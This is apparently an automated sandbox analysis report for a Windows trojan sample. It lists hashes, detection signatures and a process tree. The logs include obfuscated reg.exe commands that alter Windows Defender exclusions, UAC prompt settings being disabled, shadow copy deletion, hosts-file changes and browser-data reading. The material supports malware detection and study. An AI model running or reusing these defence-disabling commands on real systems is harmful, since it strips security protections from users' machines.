Analysis
-
max time kernel
150s -
max time network
135s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
14-11-2024 23:57
Static task
static1
Behavioral task
behavioral1
Sample
Trojan.Win32.DelShad.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Trojan.Win32.DelShad.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Trojan.Win32.DelShad.exe
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral4
Sample
Trojan.Win32.DelShad.exe
Resource
win11-20241007-en
General
-
Target
Trojan.Win32.DelShad.exe
-
Size
30.2MB
-
MD5
52cc1d2fbc403848c18f3c95dd63d727
-
SHA1
9c5067b86ffc4ab6908aea7d9adf0b82353db3af
-
SHA256
a9883030a711aebd2ec7faff0091135ee590a0e6ac613a963f55e43edc00c595
-
SHA512
7e59c7ae07bca570ce162633cfac5817bc6f012168afa3a24def0c95fef3c3251648a560761e9d967db36b31e437dbd2ed2ac884d62d4c4ee61a808a830754a0
-
SSDEEP
393216:jQV5xOYevAex37XtjUIahEeBLQV5xOYevAex37XtjUIahEeBLQV5xOYevAex37Xq:cj8579oIIaj8579oIIaj8579oIIF
Malware Config
Signatures
-
Processes:
reg.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\WIndoWs defender sECuritY centEr\notIFICATions reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\WIndoWs defender sECuritY centEr\notIFICATions\dIsablEEnhAncEdnOtiFiCatiOns = "1" reg.exe Key created \REGISTRY\MACHINE\sOFTwAre\micrOsOfT\WIndoWs defender sECuritY centEr\notIFICATions reg.exe -
Processes:
reg.exereg.exereg.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsenTPrompTbEhAvIoradmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsEnTPromptbehavIOrUser = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromPTOnsECUredesKtoP = "0" reg.exe -
Processes:
rEg.EXErEg.EXErEG.EXEdescription ioc Process Key created \REGISTRY\MACHINE\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns rEg.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs\Cmd = "0" rEg.EXE Key created \REGISTRY\MACHINE\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns rEg.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs\EXE = "0" rEg.EXE Key created \REGISTRY\MACHINE\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs rEG.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs rEG.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs\SCr = "0" rEG.EXE -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Disables use of System Restore points 1 TTPs
-
Drops file in Drivers directory 1 IoCs
Processes:
cmd.exedescription ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts cmd.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Windows11InstaIIation.sCrdescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Windows11InstaIIation.sCr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Windows11InstaIIation.sCr -
Drops startup file 1 IoCs
Processes:
Trojan.Win32.DelShad.tmpdescription ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows11InstallationAssistant.lnk Trojan.Win32.DelShad.tmp -
Executes dropped EXE 17 IoCs
Processes:
Trojan.Win32.DelShad.tmpTrojan.Win32.DelShad.tmppik.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exeWindows11InstaIIation.scrWindows11InstaIIation.sCrpid Process 5112 Trojan.Win32.DelShad.tmp 244 Trojan.Win32.DelShad.tmp 5004 pik.exe 3448 rp.exe 4636 rp.exe 1220 rp.exe 2412 rp.exe 2028 rp.exe 2372 rp.exe 2200 rp.exe 2500 rp.exe 1536 rp.exe 1800 rp.exe 4136 rp.exe 3416 rp.exe 5064 Windows11InstaIIation.scr 3788 Windows11InstaIIation.sCr -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
icacls.exeicacls.exepid Process 2116 icacls.exe 4780 icacls.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 7 ipINFO.io -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Windows11InstaIIation.scrdescription pid Process procid_target PID 5064 set thread context of 3788 5064 Windows11InstaIIation.scr 178 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 24 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
cmd.exerp.exerp.execmd.execurl.exepowershell.exeTrojan.Win32.DelShad.tmptaskkill.exerp.exerp.exerp.exerp.exerp.exeTrojan.Win32.DelShad.exerp.exerp.exerp.execmd.exeWindows11InstaIIation.sCrTrojan.Win32.DelShad.exerp.exeWindows11InstaIIation.scrTrojan.Win32.DelShad.tmprp.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan.Win32.DelShad.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan.Win32.DelShad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Windows11InstaIIation.sCr Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan.Win32.DelShad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Windows11InstaIIation.scr Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan.Win32.DelShad.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
find.exefind.exepid Process 2852 find.exe 4268 find.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
Windows11InstaIIation.sCrdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Windows11InstaIIation.sCr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Windows11InstaIIation.sCr -
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
Windows11InstaIIation.sCrdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Windows11InstaIIation.sCr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer Windows11InstaIIation.sCr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Windows11InstaIIation.sCr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion Windows11InstaIIation.sCr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion Windows11InstaIIation.sCr -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid Process 860 vssadmin.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid Process 4912 taskkill.exe -
Modifies data under HKEY_USERS 20 IoCs
Processes:
rp.exerp.exerp.exerp.exedescription ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" rp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" rp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" rp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" rp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" rp.exe -
Suspicious behavior: EnumeratesProcesses 56 IoCs
Processes:
Trojan.Win32.DelShad.tmprp.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 244 Trojan.Win32.DelShad.tmp 244 Trojan.Win32.DelShad.tmp 3448 rp.exe 3448 rp.exe 3448 rp.exe 3448 rp.exe 4636 rp.exe 4636 rp.exe 4636 rp.exe 4636 rp.exe 1220 rp.exe 1220 rp.exe 1220 rp.exe 1220 rp.exe 2028 rp.exe 2028 rp.exe 2372 rp.exe 2372 rp.exe 2372 rp.exe 2372 rp.exe 2028 rp.exe 2028 rp.exe 2200 rp.exe 2200 rp.exe 2200 rp.exe 2200 rp.exe 1536 rp.exe 1536 rp.exe 1536 rp.exe 1536 rp.exe 4136 rp.exe 4136 rp.exe 4136 rp.exe 4136 rp.exe 2072 powershell.exe 2072 powershell.exe 3180 powershell.exe 3180 powershell.exe 1772 powershell.exe 1772 powershell.exe 2820 powershell.exe 2820 powershell.exe 320 powershell.exe 320 powershell.exe 4880 powershell.exe 4880 powershell.exe 1108 powershell.exe 1108 powershell.exe 1848 powershell.exe 1848 powershell.exe 1696 powershell.exe 1696 powershell.exe 2444 powershell.exe 2444 powershell.exe 1116 powershell.exe 1116 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskkill.exepik.exevssvc.exeWMIC.exerp.exerp.exerp.exerp.exerp.exedescription pid Process Token: SeDebugPrivilege 4912 taskkill.exe Token: SeDebugPrivilege 5004 pik.exe Token: SeBackupPrivilege 560 vssvc.exe Token: SeRestorePrivilege 560 vssvc.exe Token: SeAuditPrivilege 560 vssvc.exe Token: SeIncreaseQuotaPrivilege 3108 WMIC.exe Token: SeSecurityPrivilege 3108 WMIC.exe Token: SeTakeOwnershipPrivilege 3108 WMIC.exe Token: SeLoadDriverPrivilege 3108 WMIC.exe Token: SeSystemProfilePrivilege 3108 WMIC.exe Token: SeSystemtimePrivilege 3108 WMIC.exe Token: SeProfSingleProcessPrivilege 3108 WMIC.exe Token: SeIncBasePriorityPrivilege 3108 WMIC.exe Token: SeCreatePagefilePrivilege 3108 WMIC.exe Token: SeBackupPrivilege 3108 WMIC.exe Token: SeRestorePrivilege 3108 WMIC.exe Token: SeShutdownPrivilege 3108 WMIC.exe Token: SeDebugPrivilege 3108 WMIC.exe Token: SeSystemEnvironmentPrivilege 3108 WMIC.exe Token: SeRemoteShutdownPrivilege 3108 WMIC.exe Token: SeUndockPrivilege 3108 WMIC.exe Token: SeManageVolumePrivilege 3108 WMIC.exe Token: 33 3108 WMIC.exe Token: 34 3108 WMIC.exe Token: 35 3108 WMIC.exe Token: 36 3108 WMIC.exe Token: SeIncreaseQuotaPrivilege 3108 WMIC.exe Token: SeSecurityPrivilege 3108 WMIC.exe Token: SeTakeOwnershipPrivilege 3108 WMIC.exe Token: SeLoadDriverPrivilege 3108 WMIC.exe Token: SeSystemProfilePrivilege 3108 WMIC.exe Token: SeSystemtimePrivilege 3108 WMIC.exe Token: SeProfSingleProcessPrivilege 3108 WMIC.exe Token: SeIncBasePriorityPrivilege 3108 WMIC.exe Token: SeCreatePagefilePrivilege 3108 WMIC.exe Token: SeBackupPrivilege 3108 WMIC.exe Token: SeRestorePrivilege 3108 WMIC.exe Token: SeShutdownPrivilege 3108 WMIC.exe Token: SeDebugPrivilege 3108 WMIC.exe Token: SeSystemEnvironmentPrivilege 3108 WMIC.exe Token: SeRemoteShutdownPrivilege 3108 WMIC.exe Token: SeUndockPrivilege 3108 WMIC.exe Token: SeManageVolumePrivilege 3108 WMIC.exe Token: 33 3108 WMIC.exe Token: 34 3108 WMIC.exe Token: 35 3108 WMIC.exe Token: 36 3108 WMIC.exe Token: SeDebugPrivilege 3448 rp.exe Token: SeAssignPrimaryTokenPrivilege 3448 rp.exe Token: SeIncreaseQuotaPrivilege 3448 rp.exe Token: 0 3448 rp.exe Token: SeDebugPrivilege 4636 rp.exe Token: SeAssignPrimaryTokenPrivilege 4636 rp.exe Token: SeIncreaseQuotaPrivilege 4636 rp.exe Token: SeDebugPrivilege 1220 rp.exe Token: SeAssignPrimaryTokenPrivilege 1220 rp.exe Token: SeIncreaseQuotaPrivilege 1220 rp.exe Token: 0 1220 rp.exe Token: SeDebugPrivilege 2028 rp.exe Token: SeAssignPrimaryTokenPrivilege 2028 rp.exe Token: SeIncreaseQuotaPrivilege 2028 rp.exe Token: SeDebugPrivilege 2372 rp.exe Token: SeAssignPrimaryTokenPrivilege 2372 rp.exe Token: SeIncreaseQuotaPrivilege 2372 rp.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
Trojan.Win32.DelShad.tmppid Process 244 Trojan.Win32.DelShad.tmp -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Windows11InstaIIation.scrpid Process 5064 Windows11InstaIIation.scr -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Trojan.Win32.DelShad.exeTrojan.Win32.DelShad.tmpTrojan.Win32.DelShad.exeTrojan.Win32.DelShad.tmpWScript.execmd.exedescription pid Process procid_target PID 2488 wrote to memory of 5112 2488 Trojan.Win32.DelShad.exe 77 PID 2488 wrote to memory of 5112 2488 Trojan.Win32.DelShad.exe 77 PID 2488 wrote to memory of 5112 2488 Trojan.Win32.DelShad.exe 77 PID 5112 wrote to memory of 1092 5112 Trojan.Win32.DelShad.tmp 78 PID 5112 wrote to memory of 1092 5112 Trojan.Win32.DelShad.tmp 78 PID 5112 wrote to memory of 1092 5112 Trojan.Win32.DelShad.tmp 78 PID 1092 wrote to memory of 244 1092 Trojan.Win32.DelShad.exe 79 PID 1092 wrote to memory of 244 1092 Trojan.Win32.DelShad.exe 79 PID 1092 wrote to memory of 244 1092 Trojan.Win32.DelShad.exe 79 PID 244 wrote to memory of 4912 244 Trojan.Win32.DelShad.tmp 80 PID 244 wrote to memory of 4912 244 Trojan.Win32.DelShad.tmp 80 PID 244 wrote to memory of 4912 244 Trojan.Win32.DelShad.tmp 80 PID 244 wrote to memory of 5004 244 Trojan.Win32.DelShad.tmp 83 PID 244 wrote to memory of 5004 244 Trojan.Win32.DelShad.tmp 83 PID 1636 wrote to memory of 2912 1636 WScript.exe 87 PID 1636 wrote to memory of 2912 1636 WScript.exe 87 PID 2912 wrote to memory of 1660 2912 cmd.exe 89 PID 2912 wrote to memory of 1660 2912 cmd.exe 89 PID 2912 wrote to memory of 1124 2912 cmd.exe 90 PID 2912 wrote to memory of 1124 2912 cmd.exe 90 PID 2912 wrote to memory of 2808 2912 cmd.exe 91 PID 2912 wrote to memory of 2808 2912 cmd.exe 91 PID 2912 wrote to memory of 1496 2912 cmd.exe 92 PID 2912 wrote to memory of 1496 2912 cmd.exe 92 PID 2912 wrote to memory of 4060 2912 cmd.exe 93 PID 2912 wrote to memory of 4060 2912 cmd.exe 93 PID 2912 wrote to memory of 4964 2912 cmd.exe 94 PID 2912 wrote to memory of 4964 2912 cmd.exe 94 PID 2912 wrote to memory of 4564 2912 cmd.exe 95 PID 2912 wrote to memory of 4564 2912 cmd.exe 95 PID 2912 wrote to memory of 420 2912 cmd.exe 96 PID 2912 wrote to memory of 420 2912 cmd.exe 96 PID 2912 wrote to memory of 1524 2912 cmd.exe 97 PID 2912 wrote to memory of 1524 2912 cmd.exe 97 PID 2912 wrote to memory of 3484 2912 cmd.exe 98 PID 2912 wrote to memory of 3484 2912 cmd.exe 98 PID 2912 wrote to memory of 1000 2912 cmd.exe 99 PID 2912 wrote to memory of 1000 2912 cmd.exe 99 PID 2912 wrote to memory of 2916 2912 cmd.exe 100 PID 2912 wrote to memory of 2916 2912 cmd.exe 100 PID 2912 wrote to memory of 2952 2912 cmd.exe 101 PID 2912 wrote to memory of 2952 2912 cmd.exe 101 PID 2912 wrote to memory of 4900 2912 cmd.exe 102 PID 2912 wrote to memory of 4900 2912 cmd.exe 102 PID 2912 wrote to memory of 1116 2912 cmd.exe 103 PID 2912 wrote to memory of 1116 2912 cmd.exe 103 PID 2912 wrote to memory of 1184 2912 cmd.exe 104 PID 2912 wrote to memory of 1184 2912 cmd.exe 104 PID 2912 wrote to memory of 2480 2912 cmd.exe 105 PID 2912 wrote to memory of 2480 2912 cmd.exe 105 PID 2912 wrote to memory of 3156 2912 cmd.exe 106 PID 2912 wrote to memory of 3156 2912 cmd.exe 106 PID 2912 wrote to memory of 4452 2912 cmd.exe 107 PID 2912 wrote to memory of 4452 2912 cmd.exe 107 PID 2912 wrote to memory of 3160 2912 cmd.exe 108 PID 2912 wrote to memory of 3160 2912 cmd.exe 108 PID 2912 wrote to memory of 3112 2912 cmd.exe 109 PID 2912 wrote to memory of 3112 2912 cmd.exe 109 PID 2912 wrote to memory of 1252 2912 cmd.exe 110 PID 2912 wrote to memory of 1252 2912 cmd.exe 110 PID 2912 wrote to memory of 1448 2912 cmd.exe 111 PID 2912 wrote to memory of 1448 2912 cmd.exe 111 PID 2912 wrote to memory of 2920 2912 cmd.exe 112 PID 2912 wrote to memory of 2920 2912 cmd.exe 112 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\Users\Admin\AppData\Local\Temp\is-7HM1N.tmp\Trojan.Win32.DelShad.tmp"C:\Users\Admin\AppData\Local\Temp\is-7HM1N.tmp\Trojan.Win32.DelShad.tmp" /SL5="$D023E,9723063,876544,C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5112 -
C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" /verysilent /sp-3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1092 -
C:\Users\Admin\AppData\Local\Temp\is-KI35J.tmp\Trojan.Win32.DelShad.tmp"C:\Users\Admin\AppData\Local\Temp\is-KI35J.tmp\Trojan.Win32.DelShad.tmp" /SL5="$E023E,9723063,876544,C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" /verysilent /sp-4⤵
- Drops startup file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:244 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\system32\taskkill.exe" /f /im "Windows11InstaIIation.scr"5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4912
-
-
C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\pik.exe"C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\pik.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5004
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\.cmd""5⤵
- System Location Discovery: System Language Discovery
PID:3760 -
C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exerp.EXE /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3448 -
C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe" /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4636 -
C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe" /TI/ /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2412 -
C:\Windows\system32\rEG.EXE"C:\Windows\system32\rEG.EXE" add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F9⤵
- Windows security bypass
PID:2472
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exerP.EXE /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1220 -
C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe" /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2028 -
C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe" /TI/ /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2500 -
C:\Windows\system32\rEg.EXE"C:\Windows\system32\rEg.EXE" Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f9⤵
- Windows security bypass
PID:2860
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exerP.EXE /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2372 -
C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe" /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2200 -
C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe" /TI/ /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1800 -
C:\Windows\system32\rEg.EXE"C:\Windows\system32\rEg.EXE" Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F9⤵
- Windows security bypass
PID:1284
-
-
-
-
-
